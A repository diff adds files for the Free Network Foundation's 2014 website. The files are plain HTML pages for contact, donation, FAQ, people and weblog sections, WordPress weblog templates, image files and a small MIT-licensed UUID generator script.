src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmeditable.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmaccordions.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmasmselect.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmtooltip.js"></script>
<script type="text/javascript">var cj = jQuery.noConflict();</script><form
action="http://thefnf.org/index.php?page=CiviCRM&amp;q=civicrm/profile/create&amp;gid=17&amp;reset=1"
method="post" name="Edit" id="Edit" >
<div><input name="postURL" type="hidden"
value="http://newfront.thefnf.org/contact.html" />
<input name="cancelURL" type="hidden"
value="http://newfront.thefnf.org/contact.html" />
<input name="recaptcha_response_field" type="hidden"
value="manual_challenge" />
<input name="_qf_default" type="hidden" value="Edit:cancel" />
</div>
<div id="crm-container" lang="en" xml:lang="en">
<div class="messages help"><p>
For general inquiries, comments, and questions, feel free to use the following form. Your message will be forwarded to the appropriate party.</p></div><div class="form-layout-compressed"><div id="editrow-first_name" class="crm-section editrow_first_name-section form-item"><div class="label"><label for="first_name">First Name</label></div><div class="edit-value content"><input maxlength="64" size="30" name="first_name" type="text" id="first_name" class="form-text big" /></div><div class="clear"></div></div><div id="editrow-last_name" class="crm-section editrow_last_name-section form-item"><div class="label"><label for="last_name">Last Name</label></div><div class="edit-value content"><input maxlength="64" size="30" name="last_name" type="text" id="last_name" class="form-text big" /></div><div class="clear"></div></div><div id="editrow-email-Primary" class="crm-section editrow_email-Primary-section form-item"><div class="label"><label for="email-Primary"> Email (Primary)
<span class="crm-marker" title="This field is required.">*</span>
</label></div><div class="edit-value content"><input maxlength="64" size="30" name="email-Primary" type="text" id="email-Primary" class="form-text big required" /></div><div class="clear"></div></div><div id="editrow-custom_4" class="crm-section editrow_custom_4-section form-item"><div class="label"><label for="custom_4">Subject</label></div><div class="edit-value content"><input name="custom_4" type="text" id="custom_4" class="form-text" /></div><div class="clear"></div></div><div id="editrow-note" class="crm-section editrow_note-section form-item"><div class="label"><label for="note"> Message
<span class="crm-marker" title="This field is required.">*</span>
</label></div><div class="edit-value content"><textarea rows="4" cols="60" name="note" id="note" class="form-textarea required"></textarea></div><div class="clear"></div></div></div><!-- end form-layout-compressed for last profile -->
<script type="text/javascript">
var RecaptchaOptions = {theme:'blackglass'};
</script>
<div class="crm-section recaptcha-section">
<table class="form-layout-compressed">
<tr>
<td class="recaptcha_label">&nbsp;</td>
<td><script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LdbaNoSAAAAABpvCWaiqRtoT7iqR6AeXSxZwP6a "></script>
<noscript>
<iframe src="http://www.google.com/recaptcha/api/noscript?k=6LdbaNoSAAAAABpvCWaiqRtoT7iqR6AeXSxZwP6a " height="300" width="500" frameborder="0"></iframe><br/>
<textarea name="recaptcha_challenge_field" rows="3" cols="40"></textarea>
<input type="hidden" name="recaptcha_response_field" value="manual_challenge"/>
</noscript></td>
</tr>
</table>
</div>
<script type="text/javascript">cj('.recaptcha_label').attr('width', '140px');</script><div class="crm-submit-buttons">
<span class="crm-button crm-button-type-next crm-button_qf_Edit_next"><input class="form-submit default" accesskey="S" name="_qf_Edit_next" value="Save" type="submit" id="_qf_Edit_next" /></span>
<span class="crm-button crm-button-type-cancel crm-button_qf_Edit_cancel"><input class="form-submit default" name="_qf_Edit_cancel" value="Cancel" type="submit" id="_qf_Edit_cancel" /></span>
</div>
</div>
<script type="text/javascript">
</script>
<script type="text/javascript">
cj(document).ready(function(){
cj('#selector tr:even').addClass('odd-row ');
cj('#selector tr:odd ').addClass('even-row');
});
</script>
</form>
<script type="text/javascript" >
cj( function( ) {
cj("#Edit").validate({ 'errorClass': 'crm-error'});
});
</script><script type="text/javascript">jQuery.noConflict(true);</script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/Common.js"></script>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

68
fnf2014/html/donate.html Normal file
View File

@@ -0,0 +1,68 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href="index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="here" class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Donate</h2>
<div id="sidenav">
<a href="about_weblog.html" class="on">Corporate Weblog</a>
<a href="about_weblogisaac.html">Isaac's Weblog</a>
</div ##end of sidenav>
<div id="col">
<script type="text/javascript"
src="http://output90.rssinclude.com/output?type=js&amp;id=636224&amp;hash=a3d241f405029f2451d26a9c97a68a7a"></script>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

72
fnf2014/html/faq.html Normal file
View File

@@ -0,0 +1,72 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href="index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="here" class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>FAQ</h2>
<div id="sidenav">
<a href="faq.html" class="on">General</a>
<a href="faq_technical.html">Technical</a>
<a href="faq_legal.html">Legal</a>
<a href="faq_financial.html">Financial</a>
<a href="faq_volunteering.html">Volunteering</a>
</div ##end of sidenav>
<div id="col">
<h3> Our Vision</h3>
<p>We envision a world where communities build, maintain, and own their ow
share of the global computer network.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

148
fnf2014/html/indbak.html Normal file
View File

@@ -0,0 +1,148 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="js/jsor-jcarousel-7bb2e0a/skins/tango/skin.css"/>
<link rel="stylesheet" href="style.css" type="text/css" />
<script type"text/javascript" src="js/jsor-jcarousel-7bb2e0a/lib/jquery-1.4.2.min.js"></script>
<script type"text/javascript" src="js/jsor-jcarousel-7bb2e0a/lib/jquery.jcarousel.min.js"></script>
<script type="text/javascript">
jQuery(document).ready(function() {
jQuery('#mycarousel').jcarousel({
scroll: 1
});
});
</script>
</head>
<body>
<div id="header">
<img class="toplogo" src="img/logo_wordmark_trimmed.png" align="center">
<center>
<ul class="navlist">
<li class="navlist"><a class="navlist" href="about_vision.html">About</a></li>
<li class="navlist"><a class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.freenetworkfoundation.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="carousel_wrapper">
<div id=carousel_container">
<div id="frame"></div>
<div id="carousel">
<center>
<ul id="mycarousel" class="jcarousel-skin-tango">
<li width="960px"><img src="img/a_bottom.png" width=960px" height="300px"align="center"></li>
<li width="960px"><img src="img/a_middle.png" width=960px" height="300px" align="center"></li>
<li width="960px"><img src="img/a_top.png" width="960px" height="300px" align="center"></li>
</ul>
</center>
</div ##end of carousel>
</div ## end of carousel_container>
</div ## end of carousel_wrapper>
<div id="p1wrapper">
<div id="p1container" >
<br>
<p class="p1">The Free Network Foundation envisions a world where communities build, maintain, and own their own share of the global computer network.
If you share our vision...</p>
<h1 class ="p1"> Join us </h1>
</div ##end p1container>
<br>
</div ##end p1wrapper>
<div id="colwrapper">
<div id="colcontainer">
<div id="leftcol">
<center>
<h2>For supporters</h2>
<img src="./img/arrow.png">
<h4> See video and print <a
href="http://commons.freenetworkfoundation.org/index.php/Clippings">coverage</a>
of the FNF.</h4>
<h4><a href="http://mail.thefnf.org/mailman/listinfo/discuss">Join our general discussion list</a></h3>
<h4><a href="http://thefnf.org/learn/?page=CiviCRM&q=civicrm/profile/create&reset=1&gid=16">Subscribe to our newsletter</a> and receive periodic updates
on our progress.</h4>
<h4> Contribute your <a
href="http://thefnf.org/volunteer/?page=CiviCRM&q=civicrm/profile/create&reset=1&gid=14">time</a></h4>
<h4> Contribute your <a
href="https://www.wepay.com/donations/fnf">fiscal support</a> by
becoming a member.</h4>
</center>
</div ##end of leftcol>
<div id="centercol">
<center>
<h2>For operators</h2>
<img src="./img/old/world.png">
<br>
<br>
<br>
<div style="background:#000;width:350px; height:260px;font:0px
sans-serif;text-align:left;"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="cdtw"
width="350" height="240" style="outline:none"><param name="movie"
value="http://cdn.countingdownto.com/c/w.swf" /><param
name="flashvars" value="eid=234034" /><param
name="allowscriptaccess" value="always" /><param name="bgcolor"
value="#000000" /><embed name="cdtw"
src="http://cdn.countingdownto.com/c/w.swf" flashvars="eid=234034"
type="application/x-shockwave-flash" width="350" height="240"
allowscriptaccess="always" bgcolor="#000000"
style="outline:none"></embed></object><br/>
</center>
</div ##end of centercol>
<div id="rightcol">
<center>
<h2>For technologists</h2>
<img src="./img/gear.png">
<h4> <a href="http://commons.thefnf.org/index.php/Main_Page">Explore the
Wiki</a> and learn about topics related to network freedom, from
operations to programming. </h4>
<h4><a href="http://mail.thefnf.org/mailman/listinfo/builders">Join our
technical discussion list</a> and be involved in every aspect of
product development.</h4>
<h4>Checkout our repositories, find out what needs to be done, and lend
a hand with a <a
href="http://http://chili.thefnf.org">tracker account</a></h4>
</center>
</div ##end of rightcol>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

71
fnf2014/html/people.html Normal file
View File

@@ -0,0 +1,71 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href="index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="here" class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>People</h2>
<div id="sidenav">
<a href="people.html" class="on">Officers</a>
<a href="people_board.html">Board</a>
<a href="people_advisors.html">Advisors</a>
<a href="people_volunteers.html">Volunteers</a>
</div ##end of sidenav>
<div id="col">
<h3> Our Vision</h3>
<p>We envision a world where communities build, maintain, and own their ow
share of the global computer network.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

68
fnf2014/html/weblog.html Normal file
View File

@@ -0,0 +1,68 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href="index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="here" class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Weblog</h2>
<div id="sidenav">
<a href="about_weblog.html" class="on">Corporate Weblog</a>
<a href="about_weblogisaac.html">Isaac's Weblog</a>
</div ##end of sidenav>
<div id="col">
<script type="text/javascript"
src="http://output90.rssinclude.com/output?type=js&amp;id=636224&amp;hash=a3d241f405029f2451d26a9c97a68a7a"></script>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

BIN
fnf2014/img/000033_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 175 B

BIN
fnf2014/img/0f0e0c_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 165 B

BIN
fnf2014/img/161b16_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 176 B

BIN
fnf2014/img/1c1b16_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 179 B

BIN
fnf2014/img/222_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 181 B

BIN
fnf2014/img/393320_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 182 B

BIN
fnf2014/img/444_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 184 B

BIN
fnf2014/img/7d7c79_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 171 B

BIN
fnf2014/img/a_bottom.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 200 KiB

BIN
fnf2014/img/a_middle.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 193 KiB

BIN
fnf2014/img/a_top.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 172 KiB

BIN
fnf2014/img/arrow.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 925 B

BIN
fnf2014/img/c1.jpg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 182 KiB

BIN
fnf2014/img/c2.jpg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 178 KiB

BIN
fnf2014/img/c3.jpg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 180 KiB

BIN
fnf2014/img/c4.jpg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 381 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 352 B

BIN
fnf2014/img/cc.large.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.9 KiB

BIN
fnf2014/img/cc_white.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

BIN
fnf2014/img/col.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 183 B

BIN
fnf2014/img/col_wrap.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 190 B

BIN
fnf2014/img/e6dfc4_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 192 B

BIN
fnf2014/img/ffccff_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 186 B

BIN
fnf2014/img/fff3ca_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 193 B

BIN
fnf2014/img/fff_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 170 B

BIN
fnf2014/img/ffffcc_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 190 B

BIN
fnf2014/img/foot_wrap.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 184 B

BIN
fnf2014/img/frame.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 7.7 KiB

BIN
fnf2014/img/gear.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 906 B

BIN
fnf2014/img/guslogo.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 8.1 KiB

BIN
fnf2014/img/image1.orig.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 401 KiB

BIN
fnf2014/img/image1.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 401 KiB

BIN
fnf2014/img/image2.orig.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 716 KiB

BIN
fnf2014/img/image2.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 716 KiB

BIN
fnf2014/img/logo.gif Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 8.2 KiB

BIN
fnf2014/img/logo_glow.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 32 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 5.6 KiB

BIN
fnf2014/img/old/world.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.5 KiB

BIN
fnf2014/img/operators.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

BIN
fnf2014/img/p1_wrap.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 184 B

BIN
fnf2014/img/shader.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 160 B

BIN
fnf2014/img/splash_fade.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 192 B

BIN
fnf2014/img/world.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 KiB

65
fnf2014/index.php.1 Normal file
View File

@@ -0,0 +1,65 @@
<?php
/*
* * Template Name: weblog
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Weblog</h2>
<div id="sidenav">
<a href="https://thefnf.org/category/weblog" class="on">Corporate Weblog</a>
<a href="https://thefnf.org/category/imw">Isaac's Weblog</a>
</div ##end of sidenav>
<div id="col">
<!-- Start the Loop. -->
<?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?>
<!-- Test if the current post is in category 3. -->
<!-- If it is, the div box is given the CSS class "post-cat-three". -->
<!-- Otherwise, the div box is given the CSS class "post". -->
<div class="post">
<!-- Display the Title as a link to the Post's permalink. -->
<h2><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></h2>
<!-- Display the date (November 16th, 2009 format) and a link to other posts by this posts author. -->
<small><?php the_time('F jS, Y') ?> by <?php the_author_posts_link() ?></small>
<!-- Display the Post's content in a div box. -->
<div class="entry">
<?php the_content(); ?>
</div>
<!-- Display a comma separated list of the Post's Categories. -->
<p class="postmetadata">Posted in <?php the_category(', '); ?></p>
</div> <!-- closes the first div box -->
<!-- Stop The Loop (but note the "else:" - see next line). -->
<?php endwhile; else: ?>
<!-- The very first "if" tested to see if there were any Posts to -->
<!-- display. This "else" part tells what do if there weren't any. -->
<p>Sorry, no posts matched your criteria.</p>
<!-- REALLY stop The Loop. -->
<?php endif; ?>
<div class="navigation"><p><?php posts_nav_link('&#8734;','&laquo;&laquo; Go Forward In Time','Go Back in Time &raquo;&raquo;'); ?></p></div>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

65
fnf2014/index.php.pre501 Normal file
View File

@@ -0,0 +1,65 @@
<?php
/*
* * Template Name: weblog
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Weblog</h2>
<div id="sidenav">
<a href="https://thefnf.org/category/weblog" class="on">Corporate Weblog</a>
<a href="https://thefnf.org/category/imw">Isaac's Weblog</a>
</div ##end of sidenav>
<div id="col">
<!-- Start the Loop. -->
<?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?>
<!-- Test if the current post is in category 3. -->
<!-- If it is, the div box is given the CSS class "post-cat-three". -->
<!-- Otherwise, the div box is given the CSS class "post". -->
<div class="post">
<!-- Display the Title as a link to the Post's permalink. -->
<h2><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></h2>
<!-- Display the date (November 16th, 2009 format) and a link to other posts by this posts author. -->
<small><?php the_time('F jS, Y') ?> by <?php the_author_posts_link() ?></small>
<!-- Display the Post's content in a div box. -->
<div class="entry">
<?php the_content(); ?>
</div>
<!-- Display a comma separated list of the Post's Categories. -->
<p class="postmetadata">Posted in <?php the_category(', '); ?></p>
</div> <!-- closes the first div box -->
<!-- Stop The Loop (but note the "else:" - see next line). -->
<?php endwhile; else: ?>
<!-- The very first "if" tested to see if there were any Posts to -->
<!-- display. This "else" part tells what do if there weren't any. -->
<p>Sorry, no posts matched your criteria.</p>
<!-- REALLY stop The Loop. -->
<?php endif; ?>
<div class="navigation"><p><?php posts_nav_link('&#8734;','&laquo;&laquo; Go Forward In Time','Go Back in Time &raquo;&raquo;'); ?></p></div>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

View File

@@ -0,0 +1,55 @@
**
* UUID.core.js: The minimal subset of the RFC-compliant UUID generator UUID.js.
*
* @fileOverview
* @author LiosK
* @version core-1.0
* @license The MIT License: Copyright (c) 2012 LiosK.
*/
/** @constructor */
function UUID() {}
/**
* The simplest function to get an UUID string.
* @returns {string} A version 4 UUID string.
*/
UUID.generate = function() {
var rand = UUID._gri, hex = UUID._ha;
return hex(rand(32), 8) // time_low
+ "-"
+ hex(rand(16), 4) // time_mid
+ "-"
+ hex(0x4000 | rand(12), 4) // time_hi_and_version
+ "-"
+ hex(0x8000 | rand(14), 4) // clock_seq_hi_and_reserved clock_seq_low
+ "-"
+ hex(rand(48), 12); // node
};
/**
* Returns an unsigned x-bit random integer.
* @param {int} x A positive integer ranging from 0 to 53, inclusive.
* @returns {int} An unsigned x-bit random integer (0 <= f(x) < 2^x).
*/
UUID._gri = function(x) { // _getRandomInt
if (x < 0) return NaN;
if (x <= 30) return (0 | Math.random() * (1 << x));
if (x <= 53) return (0 | Math.random() * (1 << 30))
+ (0 | Math.random() * (1 << x - 30)) * (1 << 30);
return NaN;
};
/**
* Converts an integer to a zero-filled hexadecimal string.
* @param {int} num
* @param {int} length
* @returns {string}
*/
UUID._ha = function(num, length) { // _hexAligner
var str = num.toString(16), i = length - str.length, z = "0";
for (; i > 0; i >>>= 1, z += z) { if (i & 1) { str = z + str; } }
return str;
};

Some files were not shown because too many files have changed in this diff Show More